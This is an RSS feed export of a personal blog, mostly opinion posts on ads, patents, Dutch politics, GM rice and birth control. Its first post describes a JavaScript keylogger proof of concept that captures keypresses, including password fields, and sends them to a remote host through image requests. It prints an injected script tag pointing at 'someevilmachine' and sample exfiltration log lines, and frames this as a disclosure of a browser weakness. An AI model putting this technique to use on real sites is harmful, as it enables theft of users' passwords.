<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Navaho Gunleg &#187; Ideas &amp; Concepts</title>
	<atom:link href="http://navahogunleg.net/blog/category/ideas-concepts/feed/" rel="self" type="application/rss+xml" />
	<link>http://navahogunleg.net/blog</link>
	<description>...where the most significant bytes...</description>
	<lastBuildDate>Fri, 13 Aug 2010 06:35:56 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.4</generator>
		<item>
		<title>Keylogging in Javascript (or &#8220;Why the fsck does a password field send the keypress value?&#8221;)</title>
		<link>http://navahogunleg.net/blog/2008/05/30/keylogging-in-javascript-or-why-the-fsck-does-a-password-field-send-the-keypress-value/</link>
		<comments>http://navahogunleg.net/blog/2008/05/30/keylogging-in-javascript-or-why-the-fsck-does-a-password-field-send-the-keypress-value/#comments</comments>
		<pubDate>Fri, 30 May 2008 11:39:50 +0000</pubDate>
		<dc:creator>Navaho Gunleg</dc:creator>
				<category><![CDATA[Ideas & Concepts]]></category>
		<category><![CDATA[Internet & Technology]]></category>
		<category><![CDATA[Security & Privacy]]></category>

		<guid isPermaLink="false">http://navahogunleg.net/blog/2008/05/30/keylogging-in-javascript-or-why-the-fsck-does-a-password-field-send-the-keypress-value/</guid>
		<description><![CDATA[Disclaimer: The information in here is purely educational, yada yada yada. And&#8230; it&#8217;s not people that abuse things who harm people &#8212; it&#8217;s the people that put those things there without thinking. An explaination: I have always been intrigued by HTML forms. As a paranoid person, I have always wondered whether companies or websites are [...]]]></description>
			<content:encoded><![CDATA[<hr/>
<em><strong>Disclaimer:</strong> The information in here is purely educational, yada yada yada. </p>
<p>And&#8230; it&#8217;s not people that abuse things who harm people &#8212; it&#8217;s the people that put those things there without thinking.</em></p>
<hr/>
<p>An explaination: I have always been intrigued by HTML forms. As a paranoid person, I have always wondered whether companies or websites are logging keypresses to their website. Picture the situation where you want to leave feedback at a site&#8230; but finally do not hit the &#8220;Send&#8221; button because of various reasons, like, for instance, the tone was too harsh so you decide not to. For the website it could have been very useful information: <em>unsent</em> comment or feedback may be more valuable than the ones that are actually arriving in their inboxes.</p>
<p>That was quite some time ago &#8212; and I didn&#8217;t give it any more thought until recently&#8230; See, I noticed that, for instance when I have worked the whole day, or the operating system is just acting up, <em>sometimes</em> the wrong window has the <em>focus</em>, and I am happily typing away, seeing nothing appear in the window I was staring at&#8230;. (Yeh, it happens.)</p>
<p>Now, <em>there</em> could be even <em>more</em> valuable information! Interesting bits of text, login names &#8212; or even better, accidentally typed passwords!</p>
<p>With that in my paranoid mind, I started tinkering around with Javascript to see if this is actually possible&#8230; I quickly put together some rather trivial code that captures the <em>KeyboardEvent</em>, inspects it, and collects them all into a string. Through the body&#8217;s <code>onunload</code> I called a routine that displayed an alert saying something like &#8220;Hey, you left these keypresses at this website: <em>the collected string</em>&#8220;.</p>
<p>Using the <code>onunload</code> however has several drawbacks:<br />
- it isn&#8217;t always called (for instance, when the browser crashes),<br />
- it seems the body&#8217;s <code>onunload</code> can only be set when the document is generated, that kinda sucks if you wanted to do be able to do the keylogging by simply loading some remotely stored Javascript file.</p>
<p>The curious and experimenting person that I am, I realised a bad guy would be not <em>collecting</em> the information and printing it &#8212; but would be sending them to a remote machine. Hmm, a <em>remote machine</em>, so AJAX won&#8217;t do&#8230; but there are always <em>images</em>&#8230;. What if I dynamically create an image, with a <code>src</code> pointing to some <em>other</em> website, with the pressed character in the GET request? Nice and simple, right?</p>
<p>OK, so now the keylogger is loaded and active when the following line is somehow inserted into a website:</p>
<blockquote style="padding: 2px 2px 2px 2px; padding-left: 25px; margin: 2px 2px 2px 2px; margin-left: 25px; background: black; color: white;"><p>&lt;script type=&#8221;text/javascript&#8221; src=&#8221;http://someevilmachine/wtfjs.php&#8221;&gt;&lt;/script&gt;
</p></blockquote>
<p>This simple single script, when loaded, attaches itself to the <em>keyPressDown</em> event of the document, of course remembering any old setting so to be able to pass the event through to any &#8220;local&#8221; code on the target website, as an attempt to go &#8220;undetected&#8221;.</p>
<p>Also, modern websites have all kinds of Javascript running, and could do some additional &#8220;setting up&#8221; from Javascript from which the event handlers get set&#8230; In an attempt to take this into account, the logger attaches itself after a delay of a given amount of milliseconds. After that, the moment a keypress event is received in the window, the requests appear in the logfile on the remote website (obligatory dump follows):</p>
<blockquote style="padding: 2px 2px 2px 2px; padding-left: 25px; margin: 2px 2px 2px 2px; margin-left: 25px; background: black; color: white;"><p>GET /temp/wtfimg.php?c=d HTTP/1.1&#8243; 200 &#8211;<br />
GET /temp/wtfimg.php?c=s HTTP/1.1&#8243; 200 &#8211;<br />
GET /temp/wtfimg.php?c=d HTTP/1.1&#8243; 200 -</p></blockquote>
<p>The drawback to the method currently, is that it sends a request with <em>every keystroke made</em>, which may be noticed by the more adept computer user&#8230; it would be possible to send collected strings at a given interval&#8230; But really, <em>actually</em> building a succesful keylogger isn&#8217;t the point; the point was figuring out if it is really doable (which, non-surprisingly, it is).</p>
<p>By the way, I&#8217;m rightly aware of the fact that I am discussing nothing really <em>new</em> here &#8212; this is absolutely no cutting-edge stuff. More interestingly, <em>this has probably already been done by bad guys for ages</em>.</p>
<p>On some websites with many authors that incidentally have the permission to insert Javascript, these &#8220;lower level&#8221; users could be able to catch passwords of administrative users, et cetera.</p>
<p>All-in-all, the <em>only</em> thing I am <em>really</em> frigging flabbergasted at, is the fact that an <code>&lt;input type="password"&gt;</code> actually sends the pressed key in a keypress event&#8230; <em>WTF!?</em> Knowing this, and wanting to &#8220;protect&#8221; a password entry field, I tried it by giving it its own <code>onkeypress</code>-handler&#8230;.. I figured that it would get precendence over the documents&#8217; keypress, but alas, <em>it doesn&#8217;t</em>&#8230; </p>
<p>It seems that there is no way to guard against this, other than to re-set your &#8220;local&#8221; event handlers regularly (which is no solution but a hack!)&#8230;</p>
<p>In conclusion, I really think that the password input type should somehow be prevented from putting <em>any</em> valid information about the pressed key into the KeyboardEvent. I know it&#8217;s used for comparing 2 passwords to validate a user&#8217;s password change for instance &#8212; but some <em>hash</em> could perfectly suffice there. </p>
<p>I am convinced the website-scripter should not ever have to have access to the <em>real password</em> entered in that field from Javascript &#8212; thinking that that could achieve some &#8216;protection&#8217; is a flawed train of thought anyways&#8230;</p>
<p>Oh by the way, if you are looking for code: <em>I will not release it here</em>. It really isn&#8217;t difficult to cook some up yourself.</p>
]]></content:encoded>
			<wfw:commentRss>http://navahogunleg.net/blog/2008/05/30/keylogging-in-javascript-or-why-the-fsck-does-a-password-field-send-the-keypress-value/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>My proposal to reduce unnecessary power consumption: Ban animating internet ads</title>
		<link>http://navahogunleg.net/blog/2007/08/24/my-proposal-to-reduce-unnecessary-power-consumption-ban-animating-internet-ads/</link>
		<comments>http://navahogunleg.net/blog/2007/08/24/my-proposal-to-reduce-unnecessary-power-consumption-ban-animating-internet-ads/#comments</comments>
		<pubDate>Fri, 24 Aug 2007 13:22:22 +0000</pubDate>
		<dc:creator>Navaho Gunleg</dc:creator>
				<category><![CDATA[Animals & Nature]]></category>
		<category><![CDATA[Ideas & Concepts]]></category>
		<category><![CDATA[Internet & Technology]]></category>
		<category><![CDATA[Random Rantings]]></category>
		<category><![CDATA[Visions]]></category>

		<guid isPermaLink="false">http://navahogunleg.net/blog/2007/08/24/my-proposal-to-reduce-unnecessary-power-consumption-ban-animating-internet-ads/</guid>
		<description><![CDATA[With the recent focus on what human power consumption does to the environment (you know with initiative like a black Google page to save on energy consumption by computer screens), I suddenly realised something that would greatly reduce even more useless power consumption. It hit me when my girlfriends&#8217; laptop was starting to have issues [...]]]></description>
			<content:encoded><![CDATA[<p>With the recent focus on what human power consumption does to the environment (you know with initiative like a black Google page to save on energy consumption by computer screens), I suddenly realised something that would <em>greatly</em> reduce even more <em>useless</em> power consumption.</p>
<p>It hit me when my girlfriends&#8217; laptop was starting to have issues because it was running too hot and rebooting a few days ago&#8230; This was due to a clogged air-vent, and was easily solved. However, to keep an eye on the temperature, she&#8217;s loaded the KDE applet that shows the CPU temperature.</p>
<p>This gives an interesting insight into power consumption &#8230; for instance, during normal browsing, opening a few tabs, et cetera, the temperature quickly rises a 10 degrees Celsius just because of the Flash animations that are trying to sell stuff we&#8217;re not even remotely interested in&#8230;.</p>
<p>The moment you close those websites with those animations: *poof* the temperature drops and the fan quiets down again.</p>
<p>So I propose people to stop using those damned ads (or use text-ads if you really really need to). </p>
<p>(I was even thinking about taking this a step further, as a &#8220;proposal to stop irritating internet plugins&#8221; &#8230; where a plugin must show a screenshot, and a (i) button which you hover over to get informed about a plugins&#8217; intent, and allow it. If the plugins&#8217; actual action does not fit the intent, those plugin-writer should go to jail.. yeh I&#8217;m still hatching this one&#8230;)</p>
]]></content:encoded>
			<wfw:commentRss>http://navahogunleg.net/blog/2007/08/24/my-proposal-to-reduce-unnecessary-power-consumption-ban-animating-internet-ads/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Philips patents &#8216;fabric display&#8217;</title>
		<link>http://navahogunleg.net/blog/2007/04/26/philips-patents-fabric-display/</link>
		<comments>http://navahogunleg.net/blog/2007/04/26/philips-patents-fabric-display/#comments</comments>
		<pubDate>Thu, 26 Apr 2007 07:18:10 +0000</pubDate>
		<dc:creator>Navaho Gunleg</dc:creator>
				<category><![CDATA[Ideas & Concepts]]></category>
		<category><![CDATA[Random Rantings]]></category>

		<guid isPermaLink="false">http://navahogunleg.net/blog/2007/04/26/philips-patents-fabric-display/</guid>
		<description><![CDATA[I just read on Tweakers that Philips applied for a patent to a &#8216;fabric display&#8217;. Couple of years ago, while watching the Snooker championships on TV, noticing the advertisements on the players&#8217; clothes, I had this nasty vision that at one point, &#8216;internet-connected sponsorships-tags&#8216; could just change on the fly&#8230; (The patent doesn&#8217;t mention any [...]]]></description>
			<content:encoded><![CDATA[<p>I just read on Tweakers that <a href="http://appft1.uspto.gov/netacgi/nph-Parser?Sect1=PTO1&#038;Sect2=HITOFF&#038;d=PG01&#038;p=1&#038;u=%2Fnetahtml%2FPTO%2Fsrchnum.html&#038;r=1&#038;f=G&#038;l=50&#038;s1=%2220070076407%22.PGNR.&#038;OS=DN/20070076407&#038;RS=DN/20070076407">Philips applied for a patent</a> to a &#8216;fabric display&#8217;.</p>
<p>Couple of years ago, while watching the Snooker championships on TV, noticing the advertisements on the players&#8217; clothes, I had this nasty vision that at one point, &#8216;<em>internet-connected sponsorships-tags</em>&#8216; could just change on the fly&#8230; (The patent doesn&#8217;t mention any network connectivity though.) A player plays better: more companies want to be on that thing and the position is sold through eBay or something, and the highest bidder ends up on the players&#8217; shirt &#8212; until the player wins another frame which could totally change popularity and pricing. Seeing that, nowadays, advertisement-money makes the world go &#8217;round, this idea is probably viable too.</p>
<p>I really should patent the above idea&#8230;. but now that it is out in the open, thus no longer original if somebody else thinks of the idea, so <em>nobody else ever can</em>.</p>
]]></content:encoded>
			<wfw:commentRss>http://navahogunleg.net/blog/2007/04/26/philips-patents-fabric-display/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>You screwed around as a teen, now why can&#8217;t your kids?</title>
		<link>http://navahogunleg.net/blog/2007/04/13/you-screwed-around-as-a-teen-now-why-cant-your-kids/</link>
		<comments>http://navahogunleg.net/blog/2007/04/13/you-screwed-around-as-a-teen-now-why-cant-your-kids/#comments</comments>
		<pubDate>Fri, 13 Apr 2007 06:04:03 +0000</pubDate>
		<dc:creator>Navaho Gunleg</dc:creator>
				<category><![CDATA[Belegana]]></category>
		<category><![CDATA[Freedom & Repression]]></category>
		<category><![CDATA[Media, Religion & Politics]]></category>
		<category><![CDATA[Random Rantings]]></category>
		<category><![CDATA[Visions]]></category>

		<guid isPermaLink="false">http://navahogunleg.net/blog/2007/04/13/you-screwed-around-as-a-teen-now-why-cant-your-kids/</guid>
		<description><![CDATA[Couldn&#8217;t help but notice the &#8216;hype&#8217; surrounding the article entitled &#8216;You Grew Up Playing Shoot&#8217;em-Up Games. Why Can&#8217;t Your Kids?&#8230;. Although the title of that article may sound grown-up and wise, personally, I think it&#8217;s a bullshit wise-crack because I seriously doubt it has anything to do at all with computer games at all. You [...]]]></description>
			<content:encoded><![CDATA[<p>Couldn&#8217;t help but notice the &#8216;hype&#8217; surrounding the article entitled &#8216;<a href='http://www.wired.com/gaming/virtualworlds/commentary/games/2007/04/gamesfrontiers_0409'>You Grew Up Playing Shoot&#8217;em-Up Games. Why Can&#8217;t Your Kids?</a>&#8230;. Although the title of that article may sound grown-up and wise, personally,  I think it&#8217;s a bullshit wise-crack because I seriously doubt it has <em>anything</em> to do at all with computer games at all.</p>
<p>You could just as well be asking:<br />
&#8220;<em>You screwed around in the sixties, now why can&#8217;t your kids?</em>&#8221;<br />
&#8220;<em>You smoked as a teen, now why can&#8217;t your kids?</em>&#8221;<br />
&#8220;<em>You shop-lifted, broke public property and sprayed graffiti on walls, now why can&#8217;t your kids?</em>&#8221;<br />
&#8220;<em>You watched porn, now why can&#8217;t your kids watch MTV?</em>&#8221;</p>
<p>Now I could go off making dumb conclusions a few paragraphs to say with a lot of words that, well, sex, smoking and shoplifting or braking public property isn&#8217;t what it used to be&#8230; But you <em>know</em> that is just a silly waste of electronic ink. </p>
<p>(Oh, if I only wrote columns for a paper &#8212; then <em>I</em> could get payed (per word) for <em>my</em> bullshit musings, too.)</p>
<p>This doesn&#8217;t have a single thing to do with the games &#8212; it has to do with the fact that people slowly realise that TV and media <em>do</em> have a bad influence&#8230;. Under the guise of &#8216;freedom of speech&#8217; and shit like that, we get all kinds of soft-porn thrown at us &#8212; and surely girls get raped on the streets. </p>
<p>That is all OK because MTV can sell ads in between. But parents have to get the fingers pointed at and told &#8220;<em>Hey you played games as a kid why can&#8217;t yours?</em>.&#8221;. </p>
<p>So the media can sell more.</p>
]]></content:encoded>
			<wfw:commentRss>http://navahogunleg.net/blog/2007/04/13/you-screwed-around-as-a-teen-now-why-cant-your-kids/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>I got a voting-pass but I&#8217;ve lost the passion to vote</title>
		<link>http://navahogunleg.net/blog/2007/02/28/i-got-a-voting-pass-but-ive-lost-the-passion-to-vote/</link>
		<comments>http://navahogunleg.net/blog/2007/02/28/i-got-a-voting-pass-but-ive-lost-the-passion-to-vote/#comments</comments>
		<pubDate>Wed, 28 Feb 2007 08:51:41 +0000</pubDate>
		<dc:creator>Navaho Gunleg</dc:creator>
				<category><![CDATA[Conspiracies]]></category>
		<category><![CDATA[Freedom & Repression]]></category>
		<category><![CDATA[Ideas & Concepts]]></category>
		<category><![CDATA[Media, Religion & Politics]]></category>
		<category><![CDATA[Random Rantings]]></category>

		<guid isPermaLink="false">http://navahogunleg.net/blog/2007/02/28/i-got-a-voting-pass-but-ive-lost-the-passion-to-vote/</guid>
		<description><![CDATA[So, following last years November elections, the upcoming government has been formed and we&#8217;re up for another term with Yawn-Peter Balkenende as our prime-minister. It&#8217;s not surprising to see that these criminals get away with an un-just war. No investigation into the Iraqcle (Iraq + Debacle) &#8212; it&#8217;s a fucking joke how easy they can [...]]]></description>
			<content:encoded><![CDATA[<p>So, following last years November elections, the upcoming government has been formed and we&#8217;re up for another term with <em>Yawn</em>-Peter Balkenende as our prime-minister.</p>
<p>It&#8217;s not surprising to see that these criminals get away with an un-just war. No investigation into the Iraqcle (Iraq + Debacle) &#8212; it&#8217;s a fucking joke how easy they can get away with this&#8230;. These corrupt guys just throw an extra bunch of impossible new ideas into their party-program that they&#8217;re <em>sure</em> of it&#8217;ll cause major irritation and objections from all the other parties &#8212; and you can get away with the shit you <em>really</em> want to do.</p>
<p>And meanwhile, there&#8217;s another election pending, one for the Staten-Generaal, or parliament, this March&#8230;. And I am having serious doubts as to <em>vote</em>, or <em>not</em> to vote.</p>
<p>The irony is that I&#8217;ve always told other people to <em>use</em> their vote but at this point I&#8217;ve lost total trust in that system. I&#8217;m currently balancing two things on a scale:</p>
<p>1. If I vote &#8212; I am, somehow, kinda responsible for anything coming from it.<br />
2. If I do <em>not</em> vote, I am, somehow, kinda responsible for anything coming from it.</p>
<p>So basically, we have 2 different actions &#8212; both resulting in the same consequences. </p>
<p>If doing <em>something</em> and doing <em>nothing</em> have similar consequences, should any effort be made? Is that morally acceptable? We all know that, politically, things will only get worse (Entropy: the slow, but sure detoriation of a society)&#8230; </p>
<p>(Incidentally, listening to Kurtis Blow&#8217;s &#8220;<em>If I ruled the world</em>&#8221; the other day, I realised that:</p>
<ul>
<p><strong>If <em>I</em> ruled the world and there would be happiness and peace;<br />
The CIA&#8217;s terrorists would blow it to pieces.</strong></p>
</ul>
<p>And the sad reality <em>is</em> that there will never be peace because there&#8217;s always an asshole who thinks he must change other people. But I slightly digress here.)</p>
<p>Possibly, <em>taking part</em> in the voting process is basically keeping this hideous thing in motion. At least that <em>does</em> count for the herds of thousands of sheep who only know of politics what the media feeds them.</p>
<p>There&#8217;s no way for a few sane people to go up against the insane multitude with an insane system.</p>
<p>Keeping those things in mind, day by day I get more accustomed to the thought that I can just ignore stuff and <a href="http://www.seancoon.org/2007/02/oh_boy_happy_happy_joy_joy.html">head out to buy the latest video-game</a>. The multitude seems to only think about themselves, so why shouldn&#8217;t <em>I</em>.</p>
]]></content:encoded>
			<wfw:commentRss>http://navahogunleg.net/blog/2007/02/28/i-got-a-voting-pass-but-ive-lost-the-passion-to-vote/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Gen-tech contaminated rice found in Dutch supermarkets</title>
		<link>http://navahogunleg.net/blog/2006/12/21/gen-tech-contaminated-rice-found-in-dutch-supermarkets/</link>
		<comments>http://navahogunleg.net/blog/2006/12/21/gen-tech-contaminated-rice-found-in-dutch-supermarkets/#comments</comments>
		<pubDate>Thu, 21 Dec 2006 09:09:33 +0000</pubDate>
		<dc:creator>Navaho Gunleg</dc:creator>
				<category><![CDATA[Animals & Nature]]></category>
		<category><![CDATA[Conspiracies]]></category>
		<category><![CDATA[The Netherlands]]></category>
		<category><![CDATA[Visions]]></category>

		<guid isPermaLink="false">http://navahogunleg.net/blog/2006/12/21/gen-tech-contaminated-rice-found-in-dutch-supermarkets/</guid>
		<description><![CDATA[Earlier this month results from research by Greenpeace indicated that a certain brand of rice that is sold in Dutch supermarkets is contaminated with genetically modified crops. (I wouldn&#8217;t have caught this if I didn&#8217;t check Indymedia.) According to the article, it&#8217;s contaminated with a type of modified rice that can survive a certain weed-killer. [...]]]></description>
			<content:encoded><![CDATA[<p>Earlier this month  <a href='http://www.greenpeace.nl/news/greenpeace-vindt-illegale-gent'>results from research by Greenpeace</a> indicated that a certain brand of rice that is sold in Dutch supermarkets is contaminated with genetically modified crops. (I wouldn&#8217;t have caught this if I didn&#8217;t check <a href='http://indymedia.nl/nl/2006/12/41351.shtml'>Indymedia</a>.)</p>
<p>According to the article, it&#8217;s contaminated with a type of modified rice that can survive a certain weed-killer. </p>
<p>The article doesn&#8217;t at all mention the name of this weed-killer, but I think I can deduce that that <em>has</em> to be the weed-killer named &#8216;<em>Round Up</em>&#8216;. Which, really ain&#8217;t no weed-killer &#8212; it kills <em>everything</em> organic. I saw some pretty nasty shit a couple of years ago &#8212; where genetically engineered crops resisted Round Up, whilst all the other crop almost litterally &#8216;burned&#8217; away. </p>
<p>Some pretty nasty toxic stuff, well, unless you are a genetically engineered crop, of course. It&#8217;s like, genetically modifying mankind to sustain nuclear radition and dropping a bomb on the planet.</p>
<p>When I was a kid and I read technological magazines, they would talk about how genetically engineered crops will be able to grow, say, in unhabitable places such as the Sahara desert. That it would cure the world of famine and marketing it as such they probably got a lot of money for the research &#8212; but the way this technology now <em>really</em> is used really scares me. </p>
<p>What is even more worrying, the last time I went to some store for some stuff for my garden &#8212; I noticed these ordinary shops are pushing that Round Up stuff to the regular consumers now too. I guess it will be just a matter of time before they will start to sell modified grasses and bulbs, so everybody can have that <em>weed and hassle free lawn</em>. </p>
<p>Thinking about how mankind basically &#8216;genetically engineered&#8217; the <a href='http://en.wikipedia.org/wiki/Killer_bee'>killer bee</a> into existance and the impact of that mistake, I really hate to see where this stuff is heading. In my point of view they are, once again, too soon trying to make some quick money of a technology that isn&#8217;t fully developed yet. </p>
<p>The European Food Safety Authority (EFSA) states that the long-term effects of genetic modification have not been sufficiently investigated. And they&#8217;re right &#8212; it could surely be that, in the future, certain hybrids of genetically engineered crops could have a very negative impact on our environment or ourselves. And that can easily happen because pollen travels by wind and insects carry it around and so it can furtilise flowers in far away places.</p>
<p>The EFSA is playing down the danger of this rice contamination though, saying that there is <em>probably</em> nothing to worry about but this is one of the few times that I&#8217;m glad I&#8217;m a picky eater and don&#8217;t eat rice at all.</p>
<p>The LL601 strain of rice is illegal in Europe but <a href='http://www.fd.nl/ShowRedactieNieuws.asp?Context=N%7C1&#038;DocumentId=31623'>as mentioned in this article</a>, recently a shipload of American rice in the Rotterdam harbour was discovered to be contaminated &#8212; which implies that the stuff is still getting shipped into Europe.</p>
<p>The producer of the rice <a href='http://www.distrifood.nl/di_pe/distrifood.portal/enc/_nfpb/true/_pageLabel/tsdi_page_fabrikanten/tsdi_portlet_news_singleeditorschoice1_fabrikanten1_actionOverride/___2Fportlets___2Fts___2Fge___2Fnews_singleeditorschoice1___2Fcontent___2FshowDetailsList/_windowLabel/tsdi_portlet_news_singleeditorschoice1_fabrikanten1/tsdi_portlet_news_singleeditorschoice1_fabrikanten1id/38202/_desktopLabel/distrifood/'>denies</a> the alligations saying that they carefully check their rice, but they have only guaranteed their rice to be gentech-free since the 23st of August this year</em>. Rice from before that date <em>were not</em> removed from stores, though.</p>
<p>It seems like a zombie-movie, but what if the genetically engineered crops <em>have already</em> begun infecting the natural crops? It would be as good as impossible to rid the world of it.</p>
]]></content:encoded>
			<wfw:commentRss>http://navahogunleg.net/blog/2006/12/21/gen-tech-contaminated-rice-found-in-dutch-supermarkets/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The fallacy of male birth-control</title>
		<link>http://navahogunleg.net/blog/2006/12/08/the-fallacy-of-male-birth-control/</link>
		<comments>http://navahogunleg.net/blog/2006/12/08/the-fallacy-of-male-birth-control/#comments</comments>
		<pubDate>Fri, 08 Dec 2006 09:04:41 +0000</pubDate>
		<dc:creator>Navaho Gunleg</dc:creator>
				<category><![CDATA[Health]]></category>
		<category><![CDATA[Random Rantings]]></category>
		<category><![CDATA[Visions]]></category>

		<guid isPermaLink="false">http://navahogunleg.net/blog/2006/12/08/the-fallacy-of-male-birth-control/</guid>
		<description><![CDATA[You might have noticed that I don&#8217;t want to have kids (the reasons as to why are beyond the scope of this little blurb though &#8212; but I&#8217;m sure you&#8217;ll believe me when I say that, to sum it all up, it&#8217;s really best for the kid). To accomplish this my girlfriend uses some method [...]]]></description>
			<content:encoded><![CDATA[<p>You might have noticed that I don&#8217;t want to have kids (the reasons as to <em>why</em> are beyond the scope of this little blurb though &#8212; but I&#8217;m sure you&#8217;ll believe me when I say that, to sum it all up, it&#8217;s really best for the kid). To accomplish this my girlfriend uses some method of birth-control involving the usual suspects: hormones and chemicals. Hormones and chemicals that mess with the &#8216;natural&#8217; balance.</p>
<p>If you are a couple worried about the same thing, chances are you have occasionally discussed &#8216;why should <em>the woman</em> take precautions, and not <em>the man</em>?&#8217;. </p>
<p>Apparently, the pharmaceutical industry saw this coming and has started spending their research-budgets on it years ago. </p>
<p>Recently, me and the girl had the same talk, sparked by some new developments on the <em>male birth-control scene</em> I read about some time last month (looking around for references <a href='http://news.google.com/news?q=male%20birth%20control'>I noticed some recent hype about it</a>) &#8212; within a couple of years the male birth control pill may actually be a reality.</p>
<p>So we were talking about the options, when it suddenly hit me why <em>male birth-control</em> can <em>never</em> be as effective as the female. I haven&#8217;t gotten around to actually share this and because I feel I make a very solid point that both male and female would acknowledge &#8212; here goes&#8230; <img src='http://navahogunleg.net/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>First of all, don&#8217;t get me wrong, it&#8217;s not that I don&#8217;t <em>want</em> to take a responsible part in accomplishing the goal of not having kids &#8212; even though I shiver at the thought of things like surgical sterilisation. That&#8217;s why I had always thought the male birth-control pill to be a good idea (apart from possible long-term problems that might arise from teenagers using it to mess around, in contrast to using a <em>condom</em> which would beneficially prevent against venereal diseases).</p>
<p>Getting the <em>male</em> sterile (chemically, surgically or whatever way), just like the decision <em>not</em> to have sex, will not ever guarantee anything&#8230;</p>
<p>In the worst case scenario you&#8217;ve had your <em>vas deferens</em> cut in two and tied knots in, thus making it impossible for the sperm to leave your testes. OK I know it&#8217;s hard (pun unintended), but try to imagine that. That doesn&#8217;t prevent <em>any other man&#8217;s sperm</em> leaving <em>their</em> testes, now does it? [It's like, installing a firewall on machine A to prevent attacks on machine B which obviously doesn't prevent it getting probed by a third, unknown machine.]</p>
<p>I <em>don&#8217;t</em> want kids and I <em>surely</em> wouldn&#8217;t want to raise some frigging <em>rapists kid</em> &#8212; or any other guys kid for that matter.</p>
<p>Imagine if you have gone through having a vasectomy &#8212; there you stand, a man, psychologically possibly your manhood affected because of the surgical procedure &#8212; and you would <em>still</em> end up paying for an abortion or (even worse, if you have objections to abortion) waste your valuable time raising a kid you didn&#8217;t want to have in the first place, and its looks are probably a constant reminder of the rapist and that it&#8217;s not even yours. </p>
<p>Life can be a bitch at times, but <em>that</em> would <em>really</em> hurt (and it will most probably seriously mess up the kid, too).</p>
<p>In conclusion, after having thought about it while writing this post, at the moment I&#8217;m likened to think that these pills are <em>not</em> targetted at couples. They&#8217;re not for the people that seriously want to prevent (or postpone) having kids &#8212; not <em>really</em> if you think about it. It seems more targetted at the male that &#8216;screws around&#8217; and I bet that&#8217;s a goldmine.</p>
<p><tags>Birth-control</tags></p>
]]></content:encoded>
			<wfw:commentRss>http://navahogunleg.net/blog/2006/12/08/the-fallacy-of-male-birth-control/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>&#8220;Minority report&#8221; slowly becoming a reality&#8230;</title>
		<link>http://navahogunleg.net/blog/2006/11/27/minority-report-slowly-becoming-a-reality/</link>
		<comments>http://navahogunleg.net/blog/2006/11/27/minority-report-slowly-becoming-a-reality/#comments</comments>
		<pubDate>Mon, 27 Nov 2006 15:12:33 +0000</pubDate>
		<dc:creator>Navaho Gunleg</dc:creator>
				<category><![CDATA[Freedom & Repression]]></category>
		<category><![CDATA[Random Rantings]]></category>
		<category><![CDATA[Visions]]></category>

		<guid isPermaLink="false">http://navahogunleg.net/blog/2006/11/27/minority-report-slowly-becoming-a-reality/</guid>
		<description><![CDATA[I just read this article about psychologists [that] are putting together a list of the 100 most dangerous murderers and rapists before they have committed any such crimes. That&#8217;s pretty scary &#8212; especially if mix that news with a little bit of this and a little bit of that&#8230;]]></description>
			<content:encoded><![CDATA[<p>I just read <a href='http://www.news.com.au/story/0,23599,20828596-1702,00.html'>this article</a> about <em>psychologists [that] are putting together a list of the 100 most dangerous murderers and rapists before they have committed any such crimes</em>. </p>
<p>That&#8217;s pretty scary &#8212; especially if mix that news with a little bit of <a href='http://en.wikipedia.org/wiki/Brazil_%28movie%29'>this</a> and a little bit of <a href='http://www.seancoon.org/2006/11/graffiti_friday_mindless_authority.html'>that</a>&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://navahogunleg.net/blog/2006/11/27/minority-report-slowly-becoming-a-reality/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Force feedback: did I see prior art in `The Incredible Hulk&#8217;?</title>
		<link>http://navahogunleg.net/blog/2006/11/24/force-feedback-did-i-see-prior-art-in-the-incredible-hulk/</link>
		<comments>http://navahogunleg.net/blog/2006/11/24/force-feedback-did-i-see-prior-art-in-the-incredible-hulk/#comments</comments>
		<pubDate>Fri, 24 Nov 2006 12:58:40 +0000</pubDate>
		<dc:creator>Navaho Gunleg</dc:creator>
				<category><![CDATA[Computers & Hardware]]></category>
		<category><![CDATA[General]]></category>
		<category><![CDATA[Ideas & Concepts]]></category>

		<guid isPermaLink="false">http://navahogunleg.net/blog/2006/11/24/force-feedback-did-i-see-prior-art-in-the-incredible-hulk/</guid>
		<description><![CDATA[I don&#8217;t know where exactly that I read it, but some time the previous year I read this bit about a boat that sunk, in the 1960&#8242;s or 70&#8242;s, and that it was recovered by transferring ping-pong balls into it. Yeah, it made me think of the Discovery programma MythBusters as well, but it seems [...]]]></description>
			<content:encoded><![CDATA[<p>I don&#8217;t know <em>where</em> exactly that I read it, but some time the previous year I read this bit about a boat that sunk, in the 1960&#8242;s or 70&#8242;s, and that it was recovered by transferring ping-pong balls into it. Yeah, it made me think of the Discovery programma <em>MythBusters</em> as well, but it seems this way of recovering a boat was actually once used. The guy that did it, wanted to <em>patent</em> it. This was impossible because, there was some <em>prior art</em>, literally, because the concept had once appeared in a cartoon by Disney, I believe starring Donald Duck. </p>
<p>I remember it well because I thought, hey, so basically all you gotta do to prevent an idea from being stolen by a big bad company, you ought to publish it on the internet, because that can be defined as published &#8216;prior art&#8217;. (I&#8217;m not a lawyer, but I definitely see a difference between a <em>printed</em> magazine and the internet so I could be all wrong there.)</p>
